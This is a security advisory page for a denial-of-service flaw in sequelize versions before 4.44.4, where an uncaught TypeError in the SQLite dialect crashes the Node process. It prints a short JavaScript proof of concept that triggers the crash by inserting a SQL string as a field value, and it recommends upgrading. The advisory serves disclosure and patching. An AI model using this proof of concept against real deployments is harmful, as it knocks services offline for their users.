GHSA-FW4P-36J9-RRJ3

Vulnerability from github – Published: 2020-09-03 20:25 – Updated: 2020-08-31 18:48
VLAI?
Summary
Denial of Service in sequelize
Details

Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a TypeError exception for the results variable. The results value may be undefined and trigger the error on a .map call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process: 

const Sequelize = require('sequelize');

const sequelize = new Sequelize({
    dialect: 'sqlite',
    storage: 'database.sqlite'
});

const TypeError = sequelize.define('TypeError', {
    name: Sequelize.STRING,
});

TypeError.sync({force: true}).then(() => {
    return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});

Recommendation

Upgrade to version 4.44.4 or later.

Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "sequelize"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.44.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:48:48Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "Versions of `sequelize` prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect fails to catch a `TypeError` exception for the `results` variable. The `results` value may be undefined and trigger the error on a `.map` call. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.  \n\nThe following proof-of-concept crashes the Node process:  \n```\nconst Sequelize = require(\u0027sequelize\u0027);\n\nconst sequelize = new Sequelize({\n\tdialect: \u0027sqlite\u0027,\n\tstorage: \u0027database.sqlite\u0027\n});\n\nconst TypeError = sequelize.define(\u0027TypeError\u0027, {\n\tname: Sequelize.STRING,\n});\n\nTypeError.sync({force: true}).then(() =\u003e {\n\treturn TypeError.create({name: \"SELECT tbl_name FROM sqlite_master\"});\n});\n```\n\n\n## Recommendation\n\nUpgrade to version 4.44.4 or later.",
  "id": "GHSA-fw4p-36j9-rrj3",
  "modified": "2020-08-31T18:48:48Z",
  "published": "2020-09-03T20:25:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sequelize/sequelize/pull/11877"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1142"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Denial of Service in sequelize"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.